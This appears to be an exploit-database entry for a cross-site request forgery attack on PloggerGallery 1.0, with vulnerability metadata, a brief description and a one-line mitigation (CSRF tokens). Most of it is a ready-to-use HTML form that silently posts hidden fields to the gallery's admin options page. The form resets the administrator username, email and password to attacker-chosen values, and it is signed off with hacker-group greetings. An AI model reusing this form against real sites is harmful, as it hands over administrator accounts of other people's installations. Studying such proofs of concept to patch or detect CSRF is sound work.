CSRF Change Admin Password by OR4NG.M4N

vendor:

PloggerGallery

by:

Or4nG.M4N

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: PloggerGallery

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: N/A

Related CWE: N/A

CPE: a:plogger:ploggergallery

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

n/a

CSRF Change Admin Password by OR4NG.M4N

This exploit allows an attacker to change the admin password of PloggerGallery Version 1.0 by using a Cross-Site Request Forgery (CSRF) attack. The attacker can set the admin username, email, password, and confirm password fields to any value they choose. The exploit is triggered when the attacker submits the form.

Mitigation:

Implementing a CSRF token in the form to prevent unauthorized requests.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------
# Software      : PloggerGallery Version 1.0                                                                                                                             
# Author        : Or4nG.M4N                                               
# Date          : n/a    
# Dork          : Forbidden   
# Software Link : http://www.plogger.org/download/                                                                                         
-------------------------------------------------------------------------
  +---+[CSRF Change Admin Password by OR4NG.M4N]+---+
<html>                                                                     
<head>                                                                     
<title>REMOTE CSRF Change Admin Password by OR4NG.M4N</head>               
<body>
<h1>CSRF Change Admin Password by OR4NG.M4N</h1>
<form action="http://localhost/plogger/plog-admin/plog-options.php" method="post">
<table class="option-table" cellspacing="0">
<tbody><tr class="alt">
<td class="left"><label for="admin_username"></label></td>
<td class="right"><input size="40" id="admin_username" name="admin_username" value="ro0t" type="hidden"></td>
</tr>
<tr>
<td class="left"><label for="admin_email"></label></td>
<td class="right"><input size="40" id="admin_email" name="admin_email" value="priv8te@hotmail.com" type="hidden"></td>
</tr>
<tr class="alt">
<td class="left"><label for="admin_password"></label></td>
<td class="right"><input size="40" id="admin_password" name="admin_password" value="ro0t" type="hidden"></td>
<tr>
<td class="left"><label for="confirm_admin_password"></label></td>
<td class="right"><input size="40" id="confirm_admin_password" name="confirm_admin_password" value="ro0t" type="hidden"></td>
</tr>
</tbody></table>
<td class="right"><input class="submit" name="submit" value="Change FuCKeD" type="submit"></td>

--------------------------------------------------------
# Email - priv8te@hotmail.com
# GreeTz 2 - i-Hmx - Demetre - SadhacKer - The injector ]
# P0c TeaM - SarBoT511 - YoU - RGH - MY ]
# Home - www.v4-team.com - p0c.cc - inj3ct0r.com ]
---------------------------------------------------------